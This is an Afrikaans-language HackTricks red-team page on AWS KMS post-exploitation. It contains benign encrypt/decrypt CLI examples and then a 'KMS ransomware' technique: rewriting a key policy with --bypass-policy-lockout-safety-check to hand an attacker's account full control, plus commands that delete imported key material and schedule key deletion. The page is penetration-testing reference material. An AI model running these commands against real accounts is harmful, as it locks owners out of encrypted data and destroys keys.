AWS - KMS Post Exploitation

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

KMS

Vir meer inligting, kyk:

AWS - KMS Enum

Enkripteer/Deenkripteer inligting

fileb:// en file:// is URI skemas wat in AWS CLI opdragte gebruik word om die pad na plaaslike lêers te spesifiseer:

fileb://: Lees die lêer in binêre modus, algemeen gebruik vir nie-teks lêers.
file://: Lees die lêer in teksmodus, tipies gebruik vir gewone teks lêers, skripte, of JSON wat nie spesiale kodering vereistes het nie.

Let daarop dat as jy sekere data binne 'n lêer wil deenkripteer, die lêer die binêre data moet bevat, nie base64 gekodeerde data nie. (fileb://)

Gebruik 'n simmetriese sleutel

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

Gebruik 'n asymmetriese sleutel:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

'n Aanvaller met bevoorregte toegang oor KMS kan die KMS-beleid van sleutels wysig en sy rekening toegang oor hulle verleen, terwyl die toegang wat aan die regte rekening gegee is, verwyder word.

Dan sal die regte rekeninggebruikers nie in staat wees om enige inligting van enige diens wat met daardie sleutels versleuteld is, te bekom nie, wat 'n maklike maar effektiewe ransomware oor die rekening skep.

Let daarop dat AWS bestuurde sleutels nie deur hierdie aanval geraak word nie, slegs Kliënt bestuurde sleutels.

Neem ook kennis van die behoefte om die parameter --bypass-policy-lockout-safety-check te gebruik (die gebrek aan hierdie opsie in die webkonsol maak hierdie aanval slegs moontlik vanaf die CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Let daarop dat as jy daardie beleid verander en slegs toegang aan 'n eksterne rekening gee, en dan vanaf hierdie eksterne rekening probeer om 'n nuwe beleid in te stel om die toegang terug te gee aan die oorspronklike rekening, jy nie in staat sal wees.

Generiese KMS Ransomware

Globale KMS Ransomware

Daar is 'n ander manier om 'n globale KMS Ransomware uit te voer, wat die volgende stappe sou behels:

Skep 'n nuwe sleutel met 'n sleutelmateriaal ingevoer deur die aanvaller
Her-enkripteer ou data wat met die vorige weergawe enkripteer is met die nuwe een.
Verwyder die KMS-sleutel
Nou kan slegs die aanvaller, wat die oorspronklike sleutelmateriaal het, in staat wees om die enkripteerde data te dekripteer

Vernietig sleutels

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Let daarop dat AWS nou voorkom dat die vorige aksies vanaf 'n kruisrekening uitgevoer kan word:

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAWS - IAM Post Exploitation NextAWS - Lambda Post Exploitation

Last updated 9 days ago